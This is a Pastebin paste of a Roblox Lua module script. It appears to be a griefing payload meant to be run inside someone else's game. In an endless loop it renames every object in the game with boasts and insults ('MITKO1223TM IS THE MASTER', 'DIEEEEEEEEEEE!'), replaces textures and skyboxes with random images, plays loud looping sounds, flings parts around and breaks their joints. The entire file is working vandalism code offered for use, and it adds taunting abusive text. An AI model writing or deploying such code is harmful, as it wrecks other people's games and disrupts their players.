Advertisement
Mitko1223tm

aaaaaaafuuuuak

Aug 6th, 2018
201
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.08 KB | None | 0 0
  1. local module = {}
  2. --REKTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
  3. --REKT
  4. --REKT
  5. --REKT
  6. --REKT
  7. -- input
  8. function GetRecursiveChildren(Part, Children)
  9. for _, Part in pairs(Part:GetChildren()) do
  10. pcall(function()
  11. table.insert(Children, Part)
  12. GetRecursiveChildren(Part, Children)
  13. end)
  14. end
  15. return Children
  16. end
  17.  
  18.  
  19. local Phrases = {
  20. "MITKO1223TM IS THE MASTER",
  21. "MITKO1223TM IS THE MASTER",
  22. "MITKO1223TM IS THE MASTER",
  23. "MITKO1223TM IS THE MASTER",
  24. "TM IS BACK IDIOTS!",
  25. "MITKO1223TM IS THE MASTER",
  26. "ALL HAIL MITKO1223TM!",
  27. "MITKO1223TM IS THE MASTER",
  28. "MITKO1223TM IS THE MASTER",
  29. "MITKO1223TM IS THE MASTER",
  30. "TM was here!",
  31. "TM was here!",
  32. "MITKO1223TM IS THE MASTER",
  33. "TM was here!",
  34. "What's wrong,you overgrown stinking fish!",
  35. "MITKO1223TM IS THE MASTER",
  36. "You really ARE an idiot.",
  37. "MITKO1223TM IS THE MASTER",
  38. "MITKO1223TM IS THE MASTER",
  39. "MITKO1223TM IS THE MASTER",
  40. "MITKO1223TM IS THE MASTER",
  41. "DIEEEEEEEEEEE!",
  42. "THIS IS TM!",
  43.  
  44. }
  45. local s = Instance.new("Sound")
  46.  
  47. s.Name = "Sound"
  48. s.SoundId = "http://www.roblox.com/asset/?id=300794564"
  49. s.Volume = 5
  50. s.Looped = true
  51. s.archivable = false
  52.  
  53. s.Parent = game.Workspace
  54.  
  55. wait(3)
  56.  
  57. s:play()
  58.  
  59.  
  60. Textures = {
  61. "http://www.roblox.com/Asset/?id=553637465",
  62. "http://www.roblox.com/Asset/?id=910773710",
  63. "http://www.roblox.com/Asset/?id=636991752",
  64. "http://www.roblox.com/Asset/?id=578178768",
  65. "http://www.roblox.com/Asset/?id=624116366",
  66. "http://www.roblox.com/Asset/?id=952020317",
  67. "http://www.roblox.com/Asset/?id=7291792",
  68. "http://www.roblox.com/Asset/?id=146543147",
  69. "http://www.roblox.com/Asset/?id=737796819"
  70. }
  71.  
  72.  
  73. Instance.new("Sky", game:GetService("Lighting")).CelestialBodiesShown = false
  74. Instance.new("Message", Workspace)
  75. Instance.new("Hint", Workspace)
  76.  
  77.  
  78. while true do
  79. for _, Part in pairs(GetRecursiveChildren(game, {})) do
  80. pcall(function()
  81. if not Part:IsA("Player")then
  82. pcall(function() Part.Name = Phrases[math.random(1, #Phrases)] end)
  83. pcall(function() Part.Text = Phrases[math.random(1, #Phrases)] end)
  84. pcall(function() Part.Image = Textures[math.random(1, #Textures)] end)
  85. pcall(function() Part.TextureId = Textures[math.random(1, #Textures)] end)
  86. pcall(function() Part.Texture = Textures[math.random(1, #Textures)] end)
  87. pcall(function() Part.ShirtTemplate = Textures[math.random(1, #Textures)] end)
  88. pcall(function() Part.PantsTemplate = Textures[math.random(1, #Textures)] end)
  89. pcall(function() Part.Graphic = Textures[math.random(1, #Textures)] end)
  90. pcall(function() Part.Color = Color3.new(math.random(), math.random(), math.random()) end)
  91. pcall(function() Part.Color3 = Color3.new(math.random(), math.random(), math.random()) end)
  92. pcall(function()
  93. Part.SkyboxUp = Textures[math.random(1, #Textures)]
  94. Part.SkyboxDn = Textures[math.random(1, #Textures)]
  95. Part.SkyboxLf = Textures[math.random(1, #Textures)]
  96. Part.SkyboxRt = Textures[math.random(1, #Textures)]
  97. Part.SkyboxFt = Textures[math.random(1, #Textures)]
  98. Part.SkyboxBk = Textures[math.random(1, #Textures)]
  99. end)
  100. pcall(function()
  101. Part.TextColor3 = Color3.new(math.random(), math.random(), math.random())
  102. Part.BackgroundColor3 = Color3.new(math.random(), math.random(), math.random())
  103. Part.BorderColor3 = Color3.new(math.random(), math.random(), math.random())
  104. end)
  105. pcall(function()
  106. Part.Pitch = math.random() * 5
  107. Part.Volume = 1
  108. Part.Looped = true
  109. Part:Play()
  110. end)
  111. pcall(function()
  112. if math.random(1, 5) == 1 then Part.Anchored = false end
  113. if Part.Anchored == false then
  114. Part.Velocity = Vector3.new(math.random(-10, 10), math.random(0, 50), math.random(-10, 10))
  115. Part.RotVelocity = Vector3.new(math.random(-100, 100), math.random(-100, 100), math.random(-100, 100))
  116. end
  117. Part.Locked = false
  118. Part.BrickColor = BrickColor.random()
  119. Part.TopSurface = "Weld"
  120. Part.BottomSurface = "Weld"
  121. Part.FrontSurface = "Weld"
  122. Part.BackSurface = "Weld"
  123. Part.LeftSurface = "Weld"
  124. Part.RightSurface = "Weld"
  125. Part:BreakJoints()
  126. end)
  127. end
  128. end)
  129. if math.random(1, 50) == 1 then wait() end
  130. end
  131. end
  132. s.Parent = game.workspace
  133.  
  134. return module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement